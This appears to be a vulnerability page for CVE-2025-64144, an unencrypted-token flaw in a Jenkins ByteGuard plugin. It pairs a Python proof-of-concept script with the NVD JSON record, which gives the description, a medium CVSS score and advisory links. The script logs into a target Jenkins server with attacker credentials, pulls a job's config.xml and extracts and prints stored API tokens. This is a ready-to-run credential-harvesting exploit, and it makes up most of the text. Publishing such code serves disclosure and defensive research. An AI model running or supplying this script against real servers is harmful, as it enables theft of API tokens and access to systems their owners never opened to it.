CVE-2025-64144

# CVE-2025-64144 PoC - Jenkins ByteGuard Plugin API Token Leak # Requires: Jenkins access with Item/Extended Read permission import requests from xml.etree import ElementTree import re JENKINS_URL = "http://target-jenkins-server" JOB_NAME = "vulnerable-job-name" USERNAME = "attacker" API_TOKEN = "attacker-api-token" def get_config_xml(): """Retrieve job config.xml via Jenkins API""" url = f"{JENKINS_URL}/job/{JOB_NAME}/config.xml" headers = {"Accept": "application/xml"} response = requests.get( url, auth=(USERNAME, API_TOKEN), headers=headers, verify=False, timeout=30 ) if response.status_code == 200: return response.text else: print(f"Failed to fetch config.xml: HTTP {response.status_code}") return None def extract_byteguard_tokens(config_xml): """Extract unencrypted ByteGuard API tokens from config.xml""" tokens = [] # Search for ByteGuard related configuration byteguard_patterns = [ r'<byteGuard[^>]*>.*?</byteGuard>', r'<apiToken[^>]*>([^<]+)</apiToken>', r'<token[^>]*>([^<]+)</token>' ] for pattern in byteguard_patterns: matches = re.findall(pattern, config_xml, re.DOTALL) tokens.extend(matches) return tokens def main(): print("[*] CVE-2025-64144 - ByteGuard Plugin API Token Extraction") print(f"[*] Target: {JENKINS_URL}/job/{JOB_NAME}") config_xml = get_config_xml() if not config_xml: print("[-] Unable to retrieve config.xml") return tokens = extract_byteguard_tokens(config_xml) if tokens: print(f"[+] Found {len(tokens)} potential API token(s):") for i, token in enumerate(tokens, 1): print(f" Token {i}: {token.strip()}") else: print("[-] No ByteGuard tokens found in config.xml") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-64144", "sourceIdentifier": "[email protected]", "published": "2025-10-29T14:15:59.143", "lastModified": "2025-11-04T22:16:41.150", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Jenkins ByteGuard Build Actions Plugin 1.0 stores API tokens unencrypted in job config.xml files on the Jenkins controller where they can be viewed by users with Item/Extended Read permission, or access to the Jenkins controller file system."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-311"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:jenkins:byteguard_build_actions:1.0:*:*:*:*:jenkins:*:*", "matchCriteriaId": "68BCABA0-96C0-4433-AA7A-A0377572DADA"}]}]}], "references": [{"url": "https://www.jenkins.io/security/advisory/2025-10-29/#SECURITY-3560", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2025/10/29/2", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}